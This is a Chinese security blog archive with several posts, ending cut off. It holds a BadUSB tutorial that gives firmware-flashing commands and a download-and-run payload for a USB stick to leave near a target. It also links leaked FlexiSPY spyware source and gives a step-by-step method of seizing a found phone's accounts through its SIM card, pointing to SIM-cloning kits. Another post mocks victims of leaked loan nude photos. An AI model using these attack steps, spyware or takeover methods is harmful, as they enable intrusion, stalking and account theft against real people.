Windows搜索软件Everything使用不当会泄露你的隐私信息 业界新闻

这个事情其实昨天就出来,我昨天太忙了,没来得及发文章,今天来水一下!这两天事情是真的热闹啊,前有phpstudy后门事件,后有TeamViewer后门事件预警,让我们这些吃瓜的P头百姓,措手不及!

原帖是因为一个V2ex的会员cjpjxjx同学在Google搜索的时候不小心发现了:Everything 搜索软件提供的 HTTP 服务界面,不得不说 Everything 确实非常强大,可以通过网页直接浏览和秒级搜索电脑硬盘上的所有文件:

比如你私藏的游戏,成人动画片这类的。。。

游戏.png

Snipaste_2019-10-13_10-52-45.png

还有很多,比如某某银行或者说运维人员的电脑:

Snipaste_2019-10-12_20-56-02.pngSnipaste_2019-10-12_20-55-12.pngSnipaste_2019-10-12_20-51-30.png

还有一些泄露的敏感文件,文档,PPT,照片,社保信息等等,总之只要你开了everything的HTTP服务而且你是公网IP,没有做相应的防范措施,那么泄露的可能性就很大了。

通过浏览你的硬盘,比如chrome的数据存放文件夹,常见的是:%LOCALAPPDATA%\Google\Chrome\User Data\Default\ ,这个里面存放了chrome的所有数据,里面有你的cookies信息,浏览历史记录,最多浏览的网站统计,搜索记录,书签,网站登录记录等等。

Snipaste_2019-10-13_11-03-26.png

Snipaste_2019-10-13_11-04-11.png

Snipaste_2019-10-13_11-05-03.png

Snipaste_2019-10-13_11-06-04.png

Snipaste_2019-10-13_11-06-36.png

但是,我国基本国情是,绝大部分都是没有公网IP的,这些更多的是服务器居多,一般是个人的文件储存服务器:

Snipaste_2019-10-13_11-10-36.png

通过fofa搜索只有三百左右,影响应该不大。但是作为个人一定要做好类似软件的防御措施,已经有人给everything的开发者发邮件了,作为软件开发者,在给用户提供方便的同时,也应该提醒用户潜在的风险。

标签: 隐私窃取

admin 发布于  2019-10-13 10:43 

号称全球最权威的监控软件 FlexiSPY 被黑,相关源码、编译、文档被泄漏 业界新闻

号称全球最权威的监控软件 FlexiSPY 被黑,相关源码、编译、文档被泄漏,

在4月22日,由 @fleximinx 储存整理.

Source files:


bb_cyclops.zip d84f692b12c732e14ad463b4d7d0ec34 from Tweet Mega : files in 2012-01-11_v.1.03.2 folder

Gamma.zip cff15a5bad15118a7e43c1c3f0d13df1 from Tweet Mega : Gamma Symbian malware certs/signatures in Gamma folder

bin.zip aa735cb779ce9089665eb821f596a7eb from Tweet Mega : binaries of apps in bin folder

omni.zip 4677a66eab2d44e410dfb36da64705c5 from Tweet Mega : source code of Android app in 1.00.1 folder

android_cyclops.zip 5c80bcb6576d5c58143ea48ee43de5f8 from Tweet Mega : source code of Android Cyclops in Cyclops -1.00.4 folder

iphone_phoenix_4.9.1.zip 25b7416a26624ffec76b3197f84f0d59 Tweet Mega : source code of IOS app in FlexiSPY Phoenix 4.9.1 folder



github备份地址: https://github.com/Mrxn-code/flexidie


其实 FlexiSPY 就是个灰色地带的“间谍”软件。

FlexiSPY 官网有中文页面,可以细细了解下它在干什么:

https://www.flexispy.com/zh/





admin 发布于  2017-4-24 10:29 

推荐安全且匿名的邮箱 ProtonMail 网络安全

以前,我们一直想寻找安全靠谱的邮箱服务,Gmail 是首选,原因主要有几个:


  1. Google 这个大品牌的背书


  2. 安全确实做得很好,关于这点我们尤其在意前端安全是否做得足够,比如对抗 XSS/CSRF 的策略,这在邮箱攻击里是常用的手法。另外在很多安全细节上很具备前瞻性,如:全域 HTTPS 策略、Cookie 策略、内容分离策略、账号风控策略、图片安全策略、恶意内容对抗策略、等等


  3. 漏洞奖金计划很良心,基本是这种风气的鼻祖


这次,我们推荐的 ProtonMail 邮箱,虽然我们不能保证上面几点达到 Gmail 的层级,但是整体来说,我们还是觉得挺靠谱的,尤其有下面这几个特点。


  1. 开源,这点就已经让人多少放心些


  2. 点对点加密策略,这种对称加密算法几乎可以完美对抗中间人劫持(MITM),包括对 PGP 的支持,在我们看来也是一种很漂亮的方案


  3. 注册再也不需要你的个人任何隐私,比如手机号,这意味着,几乎完全一个匿名邮件是可以的


  4. 服务器坐落在瑞士,一个重视隐私且中立的国家,法律这方面很有保障,服务器的安全建设等级据说也很高


  5. 你可以选择是否开启更强的登陆日志记录,默认不会记录 IP


  6. 也有不错的漏洞奖金计划


  7. 在安全性上,对比我们上面提到 Gmail 的做法,ProtonMail 的做法更加让我们感到惊讶,这种做法能感受到 ProtonMail 在安全及隐私这方面的极致态度。我们这先不展开,因为我们计划去夺一轮漏洞奖金再说


  8. 支持 TOR 网络下的邮件服务,这下真可以做到完全匿名了。不要和我们提黑天鹅事件,我们懂


  9. 有对应移动端的 App


  10. 用户体验也是 ProtonMail 的极致追求


  11. 免费,但是你可以付费得到更好的服务,比如可以自定义域名,如果你想支持 ProtonMail 发展得更好,可以付费升级,也可以捐助


  12. 斯诺登也有在用这个服务...


  13. 创始团队出自大名鼎鼎的 CERN(欧洲核子研究组织),科学家,怪不得命名了 ProtonMail(质子邮箱),TED 及 Wikipedia 上可以看到他们的介绍,包括演讲


之前,我们确实有犹豫是否推荐这个邮箱服务,你们知道,有些东西并不是越多人知道越好,尤其是我朝特殊的情况。但我们相信,进化的步伐是永远不会停止的,我们不需要作恶,但是我们至少需要知道如何对抗很多藏在阴暗处的作恶。


我们这篇推荐不是在给 ProtonMail 做背书,是否使用,看你。


希望 ProtonMail 越来越好,也希望这个互联网越来越好。


ProtanMail 官网:

https://protonmail.com/

TOR地址:https://protonirockerxow.onion/。

注:转载自余玄大大的微信公众号

admin 发布于  2017-3-6 19:22 

看我如何解锁你得小米手机 杂七杂八

故事背景:我一个亲戚捡到了一个红米手机,然后就找到我了,让帮忙解锁。一开始我是想试下解锁,挑战一下自己 -_- :),没想到,解锁后我让他把手机还回去,他死活不还。。。具体怎么处理的请看文末=_=||


PS:解锁的方法其实至少有四五种,我这里只是根据实际情况采用这种最快也最有效的方法,通过关机重启双清的方法,现在的小米不行了。。。你根本进不去recover,可以进fasboot。还有adb shell 也需要你开启了USB调试,或者开发者模式,或是通过输入溢出崩溃锁屏UI界面进入手机等等不一一详说(感觉我可以在街边开个解锁小铺子了 /笑喷 hha )


解锁第一步:充电啊,手机一看快没电了,我怕我折腾到一般关机了就GG了!

充了半个小时后开始---他的锁屏是数字密码,试了一些比较常见的密码,都不对。。。然后再次解锁就需要4分钟后。


第二步:既然手机没法搞,那就从其他方面下手

他的手机登录了小米帐号,那就从小米帐号入手,我是想利用小米的找回密码功能重置他的密码,之后就可以在解锁界面选择忘记密码,然后输入他这个小米云账号的密码就可以了,事后证明是可以的!下面说一下详细的步骤,

关键在于他登陆的这个账号是否是这个手机号注册的,为了检测这一步,我们需要拿到他的电话号码,锁屏下没法打电话(紧急电话不算!),那就把卡拔下来,放在我的备用米4手机上,此时我的心情是忐忑的,万一卡设置了pin码就GG了。。。。不过把卡插进去后,等了几秒钟,并没有出现输入pin码的提示框,oh,耶耶耶。。。曙光在照耀 哈哈。。。那么用他卡打我小号就可以看到号码了!

就在这时候,尼玛,我说这么 打不通,开启免提一听,尼玛,欠费。。。。


到这里,关键就是如何找到电话号码,下面我说一下我知道的几种途径,欢迎各位补充!

  1. 没欠费情况下,自己互拨电话,就知道了(前提是开启了来电显示),这种运气最好,但是一般都是成立的;
  2. 欠费情况下,拨打客服电话查询,但是一般情况是打不通的,你欠费了没有人工服务了!我这个就是这样,不过我通过兑换积分这个选项,让移动成功的把他的完整的号码发给我了,/斜眼笑、/得意。haha;
  3. 每张卡后面都有一串数字和字母组合的字符串,类似于人的身份证,不过分移动(中国人)、联通(美国人)、电信(英国人)。不同的身份证罢了。我们只需要去营业厅让他查询一下,你就说我这卡欠费了,我忘记了号码了没法充值,一般的营业厅都会帮你查,甚至是pin和puk(可以解锁pin的),但是有的营业厅是需要出示身份证的,所以越偏远的地方越好查。注:不要干坏事!
  4. 万能的某宝有卖相关的破解套装,不然你看哪些到处贴广告说办理复制卡,监听卡是说着玩的?小心上当,有很多骗子也打着这幌子!自己斟酌!

2.jpg1.jpg

上图,图一是通过兑换积分获取到的手机号码,图二是通过手机验证码重置小米云帐号密码。至此,手机就是由你掌握了。

当然,我最后用他的手机登上他的QQ给他朋友说明了原因,不是我不还,是捡他手机的不还,我有什么办法。。。。为了弥补我的过失,我给他发了个最大的QQ红包,他这手机是个合约机,外观也破损差不多,二手手机就这价钱,我能做的就只能这么多了,想喷的随便,你要为了一个捡到的手机和你亲戚闹翻?而且不是我捡到的,我只能从道德的方面尽量,但是我不能也不可能用我的道德标准去要求别人。圣母婊们随便。

最后我总结一下:

现在的生活,我们的手机卡比手机更重要,请务必要做好一下几点,尽可能的降低自己的损失(丢手机了)。

  1. 手机卡一定要设置pin码,牢记你自己的puk
  2. 手机锁屏密码要设置,总好过无。
  3. 手机丢了/手机卡丢了,第一时间去就近的营业厅挂失,挂失,挂失!然后补卡。
  4. 对于重要的手机卡,比如绑定了银行卡,支付宝这类的最好专门用一张卡,不用时放在家。

如果拿到了你的手机卡,以下的事情都是可以而且很轻松的完成的:

重置你与手机卡相关联账号密码,然后登录你得这些账号,洗劫里面有价值的all。。。QQ,邮箱,Q币,支付宝,财付通,微信,各种诈骗、骚扰等。

最好提示:保护好你的手机卡。本文未对受害人做任何违法事。各位看官如遇见这种事,还是尽量把手机还给他人吧,提醒还的方式一定要注意,免得有的人不但对你拾金不昧表示感激,也有可能怒发冲冠。。。这不是没有可能的。

全文总结,这次事件其实也可以看着是有社工的成分或者是可以当作渗透中的一种突破,特别是一些机构的重要人员。

我们下回见!----Mrxn 28/12/2016


admin 发布于  2016-12-28 19:34 

QQ空间里的奇怪艾特 杂七杂八

故事背景:正在听歌,逛社区的时候,QQ弹窗,说XXX提到了你 ,也不知道谁艾特我,根本就不玩QQ空间的,就进空间看,结果就是这样的:

1.png

又是谁谁提到了你,扎金花,什么的,带一大堆评论,艾特你得好友/陌生人(没测试,但是确实艾特了一大堆人)。

因为,已经遇到过好多次我的好友里面有这种。。。但是我想看看这是什么东西,so,打开fiddler,抓包看一下,结果一看就觉得天朝真的是个因吹丝挺的国度!,发现点进后就通过腾讯的url.cn跳转,而且还带你得QQ号,IP信息,有意思的是期间有个域名,好有迷惑性:m2.people.cn,具体的看图:m.pngm2.png23.gifurl.cn.png

QQ空间周围的灰色产业都是人尽皆知的事情。。。。但是人民网这样的gov也玩这个?不能想,希望是被社,然后二级域名被卖?还是里面有人故意卖?

这些都是,鹅厂,校长,数字家的绿色通道啊,这种推广真的是防不胜防。。。。还好,只是采集访问者的信息,不是木马。。。。为什么这么说呢?

采集你信息,在天朝是在正常不过的事。。。没给你装木马就不错了!这些完全就,新闻源这类似的推广,而且你每次打开这些网址,最终引导的网站都不尽相同,什么一号店,淘宝,天猫,苏宁易购,汽车网,等等。。。

事后,问过艾特我的那个人,他说他在网吧登陆QQ时,扫描了一下二维码,呵呵哒,切记二维码不能乱扫,还有那些说烧苗登录安全的,不一定哦!

在这近乎裸体的畅游在互联网里,我们还是改处处小心微妙啊。。。。就说这么多,下回见!


admin 发布于  2016-12-3 14:53 

看完借贷宝那个10G的压缩包,我真心觉得那帮姑娘疯了。。。 杂七杂八

不是说她们穷疯了,而是说脑子真的不好。


借款的大部分是93年到97年的,也有个别81年82年的。她们借钱的条件不光是裸照,要拍扣下体和身份证一起的特写,有的还要放自摸或和别人ooxx的视频。

640.jpg

4.jpg


这个都是自己作的也就算了,除了这些还要提供身份证、护照、微信号、学校、班级、专业、学生证、转考证、食堂卡、同学电话、室友电话、家庭地址、父母电话、支付宝账号,支付宝密码、芝麻信用分。。。


有些脑子不好的把父母的身份证工作单位都给高利贷了。


最心酸的是她们的欠条,仔细看借款数字和条件,大部分是几千块,那些年轻漂亮的高利贷肯借2万的,长得丑只能借到800。。。

2(.jpg



全套看下来这帮放贷的借钱赚利息好像并不在乎能不能收回来,这么高的利息和杀人差不多了, 貌似放高利贷是醉翁之意不在酒,能还上高额的利息也不错, 还不出也不怕。


人家国外黑社会还会有什么规矩尽量不搞学生,这边倒好,感觉他们主要目的就是搜集一批年轻缺钱没什么见识更没人脉还不在乎面子没有羞耻心的学生,反正你啥都不懂,都沦落到跑我这来借钱了你身边肯定也没有能帮你出头的人了,之后叫你们去裸聊也好,搞卖肉也好,反正手上有大把不懂事学生妹不愁赚不到钱。

3.jpg



看聊天记录个别姑娘和房贷的聊天记录甚至有种这位早就想下海但是找不到门路这回终于找到组织的荒谬感。

5.jpg



反正也都成年了,想作死别人也拦不住,那我为什么说那帮姑娘疯了呢,就是有几个我看蚂蚁花呗的钱都还不上了,估计是能套现的都套了,都已经山穷水尽了。

6.jpg



都已经沦落到拿裸照去借钱了,这几位还不忘记拿个自拍杆找着角度拍蛇精脸的裸照。


而且照片一看就是美图秀秀液化了好久,你都在被逼到去拍裸照了还不忘记把眼睛变大把腰弄细把腿拉长,有这种心思和精力出门动动脑子或者打个工度过一下难关很难吗。不这么干的理由如果是性格或者心理原因那还值得同情,可是大部分人又不像,很多的生活照看起来还过得很优越, 真心不知道该说她们啥好。


***************************


受害人的隐私信息头像我全部截掉了,有头像的都是高利贷,当然也不可能是真头像,反正别问我在哪里看的,知道我也不说,这篇只是单纯讨论这个事情。那啥女儿德育教育一定要跟上,实在跟不上千万要富养啊。

最后,各位看官,切记看人不能看照片,美图秀秀这类软件已经惨无人性了-_- ||



admin 发布于  2016-12-1 13:08 

互联网黑市分析:社工库的传说 业界新闻

任何一个行业都是一个江湖,有江湖就有故事,追名逐利的人喜欢被写入故事,踏实做事的人却希望被隐匿。久而久之,江湖上的故事越来越虚名浮利,听故事的人也越来越坐井观天。岂不见无数江湖武侠小说,开篇的人物总是让我们误以为是江湖大侠,看着看着才发现一山更比一山高,到最后才发现开篇人物简直是不入流的小啰啰。而真正的高人,反而隐匿成传说。

互联网行业也是如此,大家喜欢创造故事,故事也越来越千篇一律的浮躁:什么产品上线7天就几百万用户、什么开发阶段就上亿投资、什么90后霸道总裁颠覆行业、什么大咖的内部分享、从xx看xx的四大趋势、从xx看xx的十大价值、xx的专注力、xx的微创新、xx的平台化、xx的独家专访首次讲述xx辛酸、xx概念的深度解析加独特见解,等等。翻来覆去,好像也就是那么多东西了。

就好像有些江湖人士,是需要靠卖艺为生,请个会吆喝的帮忙吆喝吆喝,弄个猴子上蹿下跳一下,响啰使劲的敲几下,骗骗几个外行人,撒点碎银子,仅此而已。接下来大家再接着吹嘘一番,比比谁拿的碎银子多点,动口不动手。长期以往,有些人招摇撞骗,也竟然成为了一代口碑中的大侠。久而久之,如今很多江湖人士只是卖艺拿贵客的碎银子为生,如何卖艺卖的更好是大家追求的目标。那些内功心法,武功秘籍,也都成为了历史,那些大侠们,也成为了传说。

难道江湖不再是那个江湖了么?其实不然,浮躁沉沦的只是江湖白道,只是这些大内侍卫,镖局镖师,衙门捕头而已。而江湖黑道中,黑客技术、海盗精神,继续被追捧,虚浮的商业模式永远不如深度技术被重视,“铁甲依旧在”的情怀还在回荡,而地下产业链相关的进步也在不断的深入,并且潜伏起来暗自发展,为了更大的目标和黑暗梦想。

什么是社工库

社工库是社会工程学数据库的简称(Social Engineering Data)。

提到社工库就必须先介绍一下社会工程学(Social Engineering),这个名词最早是在2002年由传奇黑客米特尼克(Kevin David Mitnick)在提出,但其初始目的是让全球的网民们能够懂得网络安全,提高警惕,防止没必要的个人损失。由于米特尼克在黑客界的传奇地位,很快社会工程学就开始被深入研究并且发扬光大。

社会工程学,准确来说是一门艺术和窍门的集合。它利用人性的弱点、心理的缺陷,以顺从意愿、满足欲望的方式,让人们上当,或以此为入口进行攻击。社会工程学的窍门也蕴涵了各式各样的灵活的构思与变化因素,利用人的弱点如人的本能反应、好奇心、信任、贪便宜等弱点进行攻击。它集合了心理学、社会心理学、组织行为学等一系列的学科,由于其非法性和在很多国家地区都被严厉的打击,社会工程学也变成了一个见不得光的学派。

但是在黑客群体中,社会工程学就是他们的第一方法论和必修课。离开了社会工程学,黑客们运用的网络技术几乎都没有用武之地。如果我们用黑客最喜欢的海盗来比喻,各种网络技术可以比作航海、游泳、剑术、而社会工程学即是海盗们的行为准则和创新指引。

那么什么是社会工程学数据库(社工库)呢?即黑客在运用社会工程学进行攻击的时候,积累的各方面数据的结构化数据库。简单的说,社工库是黑客用来记录攻击手段和方法的数据库,这个数据库里面有大量的信息,甚至可以找到每个人各种行为记录(每个人在每个网站上的账号、密码、分享的照片、信用卡记录、订的机票记录、通话记录、短信内容、各种社交软件的聊天等等包罗万象),比如之前有很火爆的查询开房记录的数据库,就是一个典型的极简单的社工库的例子。

那么社工库又是如何产生的,在国内的互联网地下产业链中,又是什么模式的存在,发展又是什么情况呢,我们接着分析。

社工库的发展:数据盗窃

既然是传说,背后就有很多故事,说到社工库的产生和发展,我们就得先从互联网的数据窃取与交易开始说起。

互联网用户数据泄露一直是行业关注的焦点,从最近的京东用户密码泄露事件,到之前的CSDN的数据库完全爆出,再到如家酒店的用户数据泄露,网站和黑客在用户数据上一直在进行着旷日持久的攻防战。但是爆出来的数据泄露,仅仅是冰山一角,甚至也不到。而且这些信息其实对于黑客来说,根本没有什么价值。而对于用户来说的危害,也没有想象的那么大,因为大多数时候这些数据在黑市中几乎都已经是半公开的性质了。

而数据窃取与交易这个细分领域也几乎是地下产业链隐藏的最深的一部分,很多在互联网地下产业链中沉寂了多年的大佬都并不了解此道的相关信息。绝大多数被盗窃后的网站数据,并不会公开与众,只是交易后进入到地下产业链的其他环节而已。所以目前到底有多少网站的数据已经被窃取我们没法客观的进行数据分析。但在互联网黑市中,大家说起来类似的问题,常用的一个词是“十墓九空”,也许这个说法有点夸张,但是也可以参考。

我们从2009年以来,通过黑市的舆情监控和专业网络调查,对互联网每年的流量排名前100的网站(刨去没有用户账号机制的)进行调查,结果如下:
02.png

数据窃取产业虽然隐藏的非常深,但是发展历史永久,地下产业链也随之成熟,对于如何把数据变成货币,已经有了非常完整的程序的分工协作渠道。而其模式相对简单,一般只包括:脱库、洗库、撞库这几个阶段。

在地下产业术语里面,“脱库”是指入侵有价值的网络站点,把数据库全部盗走的行为,因为谐音,也经常被戏称作“脱裤”。在取得大量的用户数据之后,黑客会通过一系列的技术手段清洗数据,并在黑市上将有价值的用户数据变现交易,这通常也被称作“洗库”。最后黑客将得到的数据在其它网站上进行尝试登陆,叫做“撞库”,因为很多用户喜欢使用统一的用户名密码,“撞库”也可以是黑客收获颇丰。

在早期的数据窃取过程中,这几个阶段几乎都是由同一个团队、甚至单个人来完成的。发展到今天,已经完全细化成产业链,很少有人从脱库、洗库一起做了,而变成:定制化模式,或交易化模式。

定制化模式:就是现有下游客户指定的某一家网站,然后聘请黑客去脱库,脱库后获得佣金的模式,在定制化模式中,有很强的黑产规矩即数据属于下游客户,而黑客不可以再次出售,或者在一定的窗口期内不能再次出售。

交易化模式:黑客去某一家网站脱库,脱库后直接在黑市上寻找下家,在这种模式下一般可以反复出售,但是由于风险较大,而且数据真实度和新鲜度不一定能得到保证,又充满了骗局,越来越没落了。

而下游客户定制某特定一家网站的脱库,是怎么盈利呢?

大多数时候,都是竞争对手或者上下游企业采购,而且大多数都是主流互联网产业链中的客户,甚至是传统企业客户。其实这个模式很简单,想一想在生意场上,这家网站的数据库对谁谁有利,谁就可能是潜在的定制客户,只不过由于很多主流互联网企业或者传统行业很少了解这个地下产业,所以就会有一些中间人,来做中介促成相关的生意,而这些中间一般情况就是黑市里面的买家或者定制客户了。
我们用实际的例子说明:M哥在黑客圈小有名气,技术过硬。某互联网医疗产品最近要拿投资,深度用户不够啊,通过中间人,辗转的找到了M哥。M哥奋战了几天,直接脱裤了几家三甲医院的网络挂号系统,历史数据应有尽有,结构化分类一应俱全。M哥到手200w,中间人到手300w,而这家互联网医疗产品由于用户的激增和数据的全面性,以及对应新产品的虚假运营,多拿来1000w的投资,绝对双赢。
03.png
社工库的发展:洗库撞库

如之前分析,不管数据如何贩卖交易,卖给谁,怎么卖,最后黑客手里面还会有一份数据,由于黑市一般都采取定制化交易,黑客们不能再次出售了,所以一般情况下黑客们会用这份数据进行洗库撞库再洗库操作。

洗库主要是清洗这些数据中可以直接变现的部分,但是这样可以直接洗库的就能洗出价值的数据,其实并不多。一般都是有预存款或者虚拟物品交易的数据库才能洗出来价值,例如:游戏账号、电商账号等等。

更多的时候,黑客将得到的数据在其它网站上进行尝试登陆,叫做“撞库”,因为很多用户喜欢使用统一的用户名密码,“撞库”其实可以收获颇丰。而撞库和洗库的过程是配合的,黑客使用自己开发的工具、直接数据库匹配登录技术以及配合黑色产业链中的打码机制(之前TOMsInsight报告中有介绍)可以对很多网站进行批量撞库,一旦成功,可以进行再次洗库。

这就好比黑客们拿到了一份没什么价值的网站的全部用户名和密码,没关系,可以用这份用户名密码来尝试着登录有价值的网站嘛,如果能登录,不就可以洗出来价值了么,我们还是继续看M哥的例子。
M哥卖掉了几家三甲医院患者的挂号数据,虽然到手200w,但是也不满足。想想这几百万条数据,应该还会有别的价值吧。但是M哥又是一个传统的讲道义的黑客,不会再次出售给别的买家。只能从这些数据本身来找到价值了。

M哥尝试用这些数据登陆QQ、京东、支付宝、淘宝、各类网游,从而洗掉里面的资产,但是由于各种网络的安全策略的保护,M哥虽然有收益,但是却不多,甚至都不够自己的洗库撞库的网络成本,于是M哥继续沉寂下来,这一沉寂,开辟了一个传说。

社工库的发展:构建传说

在很多时候,社工库都是一个传说,就像海盗里面流传的那笔谁也不知道的宝藏,只有那块已经不知道转了多少手的脏兮兮的残缺的藏宝图才预示着它的存在。但是社工库却又很客观的放在那里,一直存在,一直沉寂。

除了贩卖数据本身得到金钱上的利益之外,黑客还会把得到的数据进行整理,制作成社工库。社工库是一个积累的过程,也需要大量的人力物力的去建设,同时还是一个漫长的过程。开始的时候就像M哥一样,单兵作战的去积累,今天是三甲医院的数据库,明天是旅游网站的数据库,后天的演唱会订票网站的数据库,这些数据库积累越来越多。

M哥后来遇到了V哥,V哥是同行,手里面也有很多数据库,可以和M哥互补,两人一拍即合,把双方的数据库融合起来,内容变得更丰富。而且两个人不断的进行分析维护,排除噪点数据和没有价值的数据,相互关联,刻意的去丰富一些必需的数据字段:比如QQ号和密码、比如手机号、比如身份证号。再刻意的去交换购买补充一些极其有价值的,比如征信报告。

社工库的内容越来越丰富,而M哥和V哥两个人力量还是小,两人刻意的去联合同行,组成利益联盟,把手里面的数据都放到一个社工库,组织力量去维护去分析。

这是一个放大的效应,由于社工库的日益庞大,信息的日益完善,再加上时间的沉淀,很多数据都可以慢慢地浮出水面,可以获得相当多的信息。目前有一些公开的社工库,信息全面性和对于用户隐私的了解以及让人震惊,但是这才是仅仅公开的社工库,对于黑客们来说其实已经是没有价值的信息。真正地下的社工库的数据信息丰富程度要远远更大,也绝对隐匿。

利用社工库,几乎可以暴漏出一个网络用户的全部网络行为、大量的用户隐私,和一些牵扯到个人身份财产的相关的数据信息。

首先让洗库变得更加容易:由于数据量很大信息很全,很多的账号的的虚拟财产的转移就不像之前那么困难,了解到信息之多甚至都可以伪装成这个用户去进行操作了。

其次让各种诈骗变得简单:之前大多数诈骗都是光撒网模式,而社工库的完善后,可以非常有针对性对一些特定的用户进行诈骗。利用数据技术,甚至通过木马分析一些用户QQ聊天的内容,寻找有价值的目标,和相对更信任的关系网络。这种模式风险会更小,而且由于诈骗目标相对较大,收益更大。在这种模式下,完成技术分析工作的一般是黑客,但是最后完成诈骗的却一般不是,黑客把按照客户要求去分析,最后把可以完成某种特定诈骗的目标连通相关信息出售(黑市称脚本)。

最后社工库也成为地下产业链的基础服务商:全面的社工库基础数据,也是精准的流量获取来源,成为流量获取分发的地下产业链的基础服务和大数据服务商。一些特有的黑色产业目前非常依赖社工库,例如精准定位的赌博平台、一些p2p金融类型的诈骗、或者是一些商业骗术。

社工库还可以进行网络的定向攻击,有时候一些不懂行的人进入互联网,糊里糊涂的就被骗的搞的一塌糊涂,互联网并不简单,简单的是那些幼稚的主流科技媒体,真正的中国互联网行业水很深,深到还没有外企可以成功的地步。

而社工库也在不断的扩大,丰富,并且继续沉寂。

社工库的发展:未来趋势

从2013年以后,国内互联网黑市上的数据交易产生了严重的分层:一些大的数据盗窃团伙早已经完成早期的数据积累构建非常完善的社工库,对于一般的数据定制需求都不会再接,会专注于更深度变现更强的金融诈骗;而一些小的数据盗窃团伙还在不断的相互交易、交换数据、而且相对高调的浮出水面,其实危害反而没有那么大。

而且出于用户交互方面的考虑,目前越来越多的移动终端支付或者金融产品的安全策略略浅,再加上更丰富的网络电商活动,导致沉寂在黑产中的数据危害也越来越大。这可能也会是更多的互联网产品的设计时需要考虑的问题所在。

而真正沉浸起来的社工库,一方面已经成为传说,另外还在构建着自己未来的目标,这些才是真正危害,也是对于我们最大的威胁。我们TOMsInsight分析到此很矛盾:在这个主流互联网都在炒作概念玩击鼓传花的骗术,而地下互联网都在积累的年代,也许我们真的应该沉下心去仔细的去研究去分析去洞察,而不是人云亦云。

“暴漏出来的社工库都是小孩玩的,真正有价值的社工库谁也不会暴漏,都在沉寂”, M哥对我们TOMsInsight的调研员说到“有时候真的看不懂现在主流的互联网,拿几百万投资就嘚瑟的不得了,其实就是不入流的卖艺打赏呗,小孩过家家。我们这行很多人都能一天赚出来这个投资数的现金来,反而继续去沉寂,沉下心钻研,为了未来更大的打算。“ M哥的话有些绝对了,但是在某种程度上也值得我们反思。

给我们的启示

江湖的故事会继续,传说也会继续。有些人可以选择视而不见,有些人也会选择去逃避。但是冬天始终都会到来,冷暖自知。我们不能要求每一个互联网人都踏实下来,毕竟一些浮躁的跟风卖艺求打赏也会是很多人的生存之道,但是我们应该知道,江湖并不是由他们构成,那些传说,也都和每一个故事一样的真正的存在我们的身边。

当一个行业的地下产业比主流产业更踏实,看的更长远,也更注重积累的时候,也许很值的我们所有的从业人员反思。毕竟,传说应该属于真正的英雄!


admin 发布于  2016-4-2 12:42 

Badusb初玩步骤记录&疑问探讨 技术文章

一直在各大常逛的网站看到关于Badusb的文章,顿时觉得很神奇,很高端,于是一直想拥有这么一个邪恶的东西,可是因为2303不是很好找,并且git上的编译写入过程一看就头大,所以一直搁浅了,可是并没放弃,扯远了,扯回来。 

PS:英文好的同学可以直接去Git看官方教程 
PS:发现关于Badusb的详细教程文章国内寥寥无几,大牛们肯定都是在躲着玩..让后来想学的小白怎么办

俄罗斯大神发的帖子,有制作视频,查资料去看吧:https://dmyt.ru/forum/viewtopic.php?f=7&t=383

需要的环境&工具

0.2303芯片的U盘  (废话...)
1.Visual Studio 2012(编译所需工具用,可选安装,我会编译打包好) 
2.Java环境  (执行encoder所需) 
3..NET framework 4.5(系统自带,没有请到微软官网下载) 
4.SDCC  http://sdcc.sourceforge.net   //安装至C:\Program Files\SDCC目录下 
5.Duckencoder(编译攻击代码) 
6.Burner File BN03V104M.BIN  (2303固件)         
7.Psychson  (Badusb写入工具 https://github.com/adamcaudill/Psychson/) 
8.攻击payload  (想要执行的攻击代码) 
9.主控芯片查看工具  (可选,查看U盘主控芯片信息)

1.下载&编译攻击代码 
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads 
你可以使用HelloWorld测试,也可以用Downer下载exe并运行(第二次刷入比较麻烦,建议第一次就选好想要的payload

java -jar encoder.jar -i payload.txt -o inject.bin //使用Duckencoder目录下的encoder生成payload为bin

2.生成固件&将攻击代码写入固件

Psychson-master\firmware\build.bat //生成固件

EmbedPayload.exe C:\Psychson-master\inject.bin C:\Psychson-master\firmware\bin\fw.bin //将攻击代码写入生成的固件


3.将生成的固件写入U盘

DriveCom.exe /drive=G /action=SetBootMode //设置U盘模式

DriveCom.exe /drive=G /action=SendExecutable /burner=BN03V104M.BIN //2302固件

DriveCom.exe /drive=G /action=SendFirmware /burner=C:\Psychson-master\BN03V104M.BIN /firmware=C:\Psychson-master\firmware\bi\fw.bin //写入带有攻击代码的固件到芯片中


就不每个都传图了,直接上写入成功的图:点击查看原图

文件打包下载链接:链接:http://pan.baidu.com/s/1jIm22bk 密码:mrxn

疑问讨论:(玩过的大牛,都别躲着玩了,快出来科普问题,或说说猥琐的新姿势..) 

1.看漏洞原理,貌似是因为此芯片可编程为其他设备,如Usb键盘,打印机什么的,然后执行代码,那么U盘被编程为了其他设备,是否可以将恶意 exe写入进去,并在插入的时候执行自己存储的exe,而不是执行vbs下载(因为要考虑到内网或没网,执行一个内置并潜伏的程序应该能pass此场景) 

2.貌似它只是模拟了键盘去执行命令,那么在没有powershell的环境里如何做到隐藏执行?cmd有点显眼,虽然一闪而过 

3.如何即让它可以模拟执行命令又能像正常U盘一样存储东西(比较插上U盘结果没出现盘让人感觉有点不对)听说量产工具可以把U盘量产为不同的用途,不知道是否可以用在此处 

end:不想再折腾了。。第一次刷入helloworld成功后还小激动了会,然后发现第二次刷入新的payload出现了错误,在大牛的帮助下才成功使用短接方法重新刷入payload(在没有工具的情况下,拆开U盘橡胶外壳,不要问我是不是咬开的,我徒手撕的..) 

感谢90某大神的耐心回答,几个小时之前都没听说过U盘还有短接这东西。。(此文也是参考自他) 

下一个可能要感谢“一只猿”了,你们猜为什么 

enjoying..(ps:去目(nv)标(shen)那丢U盘吧)

原文:http://www.jeary.org/?post=51


admin 发布于  2016-4-1 14:09 

利用U盘制作简单BadUSB,插谁谁怀孕,价格便宜,人人都可以拥有 技术文章

首先 来看一下 图(如果刷坏或者想更改Payload,需要短接39和40针,再用官方刷写工具刷新),注意红色箭头标志:

点击查看原图


0x00 前言 

关于Badusb可以参看这个视屏:http://v.qq.com/boke/page/l/g/w/l01425u2igw.html

不是很新的东西,其他作者已对此做过研究测试,本文仅用来记录操作过程,保存日志,说明细节。

0x01参考资料 

https://github.com/adamcaudill/Psychson 
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads 
http://zone.wooyun.org/content/20001 

0x02环境搭建 

1、硬件 

